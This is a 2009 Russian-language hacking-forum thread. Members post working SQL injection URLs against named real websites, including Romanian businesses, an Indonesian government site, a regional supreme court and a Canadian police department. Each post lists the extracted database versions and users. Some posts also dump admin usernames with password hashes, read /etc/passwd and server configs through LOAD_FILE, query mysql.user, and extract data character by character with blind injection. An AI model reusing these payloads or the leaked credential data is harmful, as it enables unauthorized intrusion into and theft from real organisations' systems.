09.02.2009, 13:52
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.structural-project.ro/page.php?pid=-18+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS( 0x3a,Version(),Database(),User()),0x71),0x71),2,3, 4,5,6/*
Database Version: 4.1.11-log
Database name: structural
User name: project@ns3.opticnet.ro
id,password,usr
1:Razvan Ioan:3e21ab
62fb17400301d9f0156b6c3031:razvanioan
1:Niculina Tutu:3bcdff0b24ffe7eaeb6ed4966852c31f:nicktutu
1:Admin:39b508932796a4c883b56bfc20e96054:StructPro ject
www.structural-project.ro/admin
|
|
|
09.02.2009, 14:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.digitalvision.ro/index.php?modp=sas&sid=-251301462+UNION+SELECT+1,2,3,concat_ws(0x3a,versio n(),database(),user()),5,6/*&prord=ASC
Database Version: 5.0.48
Database name: digitalvision_ro
User name: dv_ro_miniuser@localhost
http://www.digitalvision.ro/admin.php
6898262ba962c9fe79fb3d5a057c8d75
|
|
|
|
09.02.2009, 15:52
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
http://www.pdn.dkp.go.id/index.php?mod=modules/prd02.php&no=-31%20union%20select%201,2,3,4,concat_ws(0x3a,user, password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29%20from%20login--
И вот содержимое таблицы Login
NIP,user,unit,level,org,time_login,time_logout,sta tus,psw,login_id,sessionid,userid,von,bis,status,s ite,UserID,UserPass,NamaUser,Level,Unker,no,user,p assword,level,no,user,password,level,no,user,passw ord,level
|
|
|
|
09.02.2009, 18:51
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://matrimoniale.oltenia.ro/trimite-14354[SQL].html
Version : 5.0.22-log
Database: matrimoniale
User : dassaev@localhost
|
|
|
|
09.02.2009, 19:27
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 4.0.24_Debian
Database name : amazighworld_org
User name : amazighworld_org@localhost |
|
|
|
09.02.2009, 19:58
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
kusa.ca PR5
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
DBVer:4.1.20
User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
DBName:desar01_cms
Работает чтение файлов...
/etc/passwd
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
/etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
Теперь посмотрим что за пользователи...
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
=)
|
|
|
|
09.02.2009, 20:38
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11--
Database Version : 5.0.32 - Debian
Database name : emapfm
User name : emapfm@localhost
Код:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14--
Database Version : 5.0.67
Database name : cms_admin
User name : root@localhost
берём админа:
Код:
http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1--
root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал  |
|
|
|
09.02.2009, 21:17
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
Код:
http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*
version: 4.0.24_Debian-10sarge2-log
user:adminstr@localhost
database:adminstr |
|
|
|
09.02.2009, 21:30
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=)))
http://tatsud.ru/index.php?link=news.php&month=-3/**/union/**/select/**/1,2,concat_ws(0x3a,Version(),Database(),User()),4+--+
юзер - tatsud@localhost
БД - BDSUD
версия MySQL - 5.0.66a
P.s. дальше копаться совесть не позволила=))
|
|
|
|
09.02.2009, 21:42
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =)
MySQL Ver: 4.1.22
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52 -> 4(ветка)
Я провел до конца брут и выяснил какой же точно версии...
User : apd@localhost
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100 -> d
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64 -> @
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99 -> c
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108 -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t
DB : hh_apd
Код:
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95 -> _
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97 -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112 -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100 -> d
Еще один клиент... на том же хостинге.. =\
tourismabbotsford.ca - PR5
Уязвимость в:
Код:
http://www.tourismabbotsford.ca/index.php?page_id=291
MySQL Ver: 4.1.22
User : tourism@localhost
DB : hh_tourism
Последний раз редактировалось Kraneg; 09.02.2009 в 22:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
